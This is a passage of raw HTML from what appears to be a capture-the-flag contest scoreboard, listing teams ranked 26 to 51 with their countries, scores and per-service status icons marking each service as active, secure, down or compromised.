src="ru.png"></td><td><b>103.2</b></td><td>1650</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>26</td><td><img width="20px" height="="20px"" src="170.jpg"><b> utmcs </b></td><td>CA <img src="ca.png"></td><td><b>102.9</b></td><td>547</td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>27</td><td><img width="20px" height="="20px"" src="198.jpg"><b> in23canation </b></td><td>DE <img src="de.png"></td><td><b>92.8</b></td><td>212</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>28</td><td><img width="20px" height="="20px"" src="212.jpg"><b> Kernel Sanders </b></td><td>US <img src="us.png"></td><td><b>92.2</b></td><td>167</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>29</td><td><img width="20px" height="="20px"" src="129.jpg"><b> SecDawgs </b></td><td>US <img src="us.png"></td><td><b>87.1</b></td><td>448</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>30</td><td><img width="20px" height="="20px"" src="183.jpg"><b> 0ldEur0pe </b></td><td>DE <img src="de.png"></td><td><b>83.9</b></td><td>1250</td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>31</td><td><img width="20px" height="="20px"" src="152.jpg"><b> Delusions of Grandeur </b></td><td>US <img src="us.png"></td><td><b>82.7</b></td><td>10</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>32</td><td><img width="20px" height="="20px"" src="139.jpg"><b> 49th Security Division </b></td><td>US <img src="us.png"></td><td><b>80.3</b></td><td>5</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>33</td><td><img width="20px" height="="20px"" src="140.jpg"><b> c00kies@venice </b></td><td>IT <img src="it.png"></td><td><b>76.2</b></td><td>394</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>34</td><td><img width="20px" height="="20px"" src="161.jpg"><b> Red Cops </b></td><td>FR <img src="fr.png"></td><td><b>74.3</b></td><td>664</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>35</td><td><img width="20px" height="="20px"" src="207.jpg"><b> Persistent Threat Hacking Club </b></td><td>US <img src="us.png"></td><td><b>69.9</b></td><td>290</td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>36</td><td><img width="20px" height="="20px"" src="202.jpg"><b> Team Omega </b></td><td>US <img src="us.png"></td><td><b>68.6</b></td><td>214</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>37</td><td><img width="20px" height="="20px"" src="159.jpg"><b> Hackademics </b></td><td>DE <img src="de.png"></td><td><b>65.2</b></td><td>1</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>38</td><td><img width="20px" height="="20px"" src="186.jpg"><b> VUBAR </b></td><td>NL <img src="nl.png"></td><td><b>63.1</b></td><td>730</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>39</td><td><img width="20px" height="="20px"" src="160.jpg"><b> NULLify </b></td><td>US <img src="us.png"></td><td><b>58.1</b></td><td>234</td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>40</td><td><img width="20px" height="="20px"" src="134.jpg"><b> WizardsOfDos </b></td><td>DE <img src="de.png"></td><td><b>53.5</b></td><td>249</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>41</td><td><img width="20px" height="="20px"" src="181.jpg"><b> THC </b></td><td>NL <img src="nl.png"></td><td><b>47.0</b></td><td>1911</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>42</td><td><img width="20px" height="="20px"" src="176.jpg"><b> SchwarzwalderKriptSciddies </b></td><td>DE <img src="de.png"></td><td><b>46.7</b></td><td>199</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>43</td><td><img width="20px" height="="20px"" src="177.jpg"><b> Bushbabies </b></td><td>RU <img src="ru.png"></td><td><b>46.6</b></td><td>226</td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d1"><td>44</td><td><img width="20px" height="="20px"" src="166.jpg"><b> alcapwn </b></td><td>DE <img src="de.png"></td><td><b>45.2</b></td><td>519</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>45</td><td><img width="20px" height="="20px"" src="150.jpg"><b> RPISEC </b></td><td>US <img src="us.png"></td><td><b>45.0</b></td><td>916</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>46</td><td><img width="20px" height="="20px"" src="141.jpg"><b> h4ck!nb3rg </b></td><td>AT <img src="at.png"></td><td><b>42.5</b></td><td>38</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>47</td><td><img width="20px" height="="20px"" src="154.jpg"><b> Cheddar Horsemen </b></td><td>AU <img src="au.png"></td><td><b>40.8</b></td><td>601</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>48</td><td><img width="20px" height="="20px"" src="187.jpg"><b> CeSeNA </b></td><td>IT <img src="it.png"></td><td><b>36.4</b></td><td>1319</td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d0"><td>49</td><td><img width="20px" height="="20px"" src="147.jpg"><b> HakM@ri$t </b></td><td>US <img src="us.png"></td><td><b>30.9</b></td><td>309</td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="broken.png" width="10px" alt="Service Compromised!" title="Service Compromised!"></td><td> <img src="on.gif" width="10px" alt="Active" title="Active"><img src="locked.png" width="10px" alt="Secure" title="Secure"></td></tr><tr class="d1"><td>50</td><td><img width="20px" height="="20px"" src="199.jpg"><b> Local Maximum </b></td><td>DE <img src="de.png"></td><td><b>29.1</b></td><td>4</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td></tr><tr class="d0"><td>51</td><td><img width="20px" height="="20px"" src="179.jpg"><b> Wild Hatz </b></td><td>US <img src="us.png"></td><td><b>26.1</b></td><td>5</td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service Down!"></td><td> <img src="off.gif" width="10px" title="Service Down!" alt="Service 